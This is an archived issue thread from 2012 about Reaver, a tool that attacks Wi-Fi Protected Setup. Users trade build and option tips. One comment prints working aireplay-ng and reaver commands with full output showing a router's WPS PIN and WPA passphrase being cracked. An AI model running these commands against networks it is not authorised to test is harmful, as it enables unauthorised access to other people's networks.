Closed GoogleCodeExporter closed 8 years ago
Try to put it as first argument. The -c has an similiar issue if you put it
before the ssid i think
Original comment by andremeg...@hotmail.com
on 15 Jan 2012 at 9:58
The -c bug has been fixed. The -A option does exist and works; hurenhannes,
make sure you are doing a full 'make cleanall && ./configure && make && make
install' when you check out new SVN updates (the -A option was added several
revs ago).
Original comment by cheff...@tacnetsol.com
on 16 Jan 2012 at 5:00
-A does indeed work
but at least on the AP I am working with now, after every PIN reaver tests I
get disassociated
so try setting smaller reassociation interval (instead of 600s something like
5-30s)
Original comment by jcdento...@gmail.com
on 16 Jan 2012 at 10:44
Make sure you are running the latest SVN code; the -A option was not in reaver
1.3.
Original comment by cheff...@tacnetsol.com
on 16 Jan 2012 at 3:15
Success!!! make cleanall FTW
root@bt:~# aireplay-ng mon0 -1 30 -a 88:25:2C:52:67:63 -h 00:c0:ca:36:72:a3
10:57:59 Waiting for beacon frame (BSSID: 88:25:2C:52:67:63) on channel 6
10:57:59 Sending Authentication Request (Open System) [ACK]
10:57:59 Authentication successful
10:57:59 Sending Association Request [ACK]
10:57:59 Association successful :-) (AID: 1)
root@bt:~# reaver -i mon0 -b 88:25:2C:52:67:63 -c 6 -e test -w -d 5 -vv -A
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
<cheffner@tacnetsol.com>
[+] Switching mon0 to channel 6
[+] Waiting for beacon from 88:25:2C:52:67:63
[+] Associated with 88:25:2C:52:67:63 (ESSID: test)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Key cracked in 7 seconds
[+] WPS PIN: '12345670'
[+] WPA PSK: '48514323'
[+] AP SSID: 'test'
[+] Nothing done, nothing to save.
Original comment by hurenhan...@googlemail.com
on 16 Jan 2012 at 4:22
"Reaver v1.4 WiFi Protected Setup Attack Tool" 1.4 version how can i download
this version?
Original comment by burakozy...@gmail.com
on 16 Jan 2012 at 4:29
[deleted comment]
[deleted comment]
take a look issue 140 comment 6
Original comment by patricks...@gmail.com
on 16 Jan 2012 at 4:33
Nice! It's always a good day when your AP uses the pin 12345670. :)
Original comment by cheff...@tacnetsol.com
on 16 Jan 2012 at 4:50
Original issue reported on code.google.com by
hurenhan...@googlemail.com
on 15 Jan 2012 at 7:40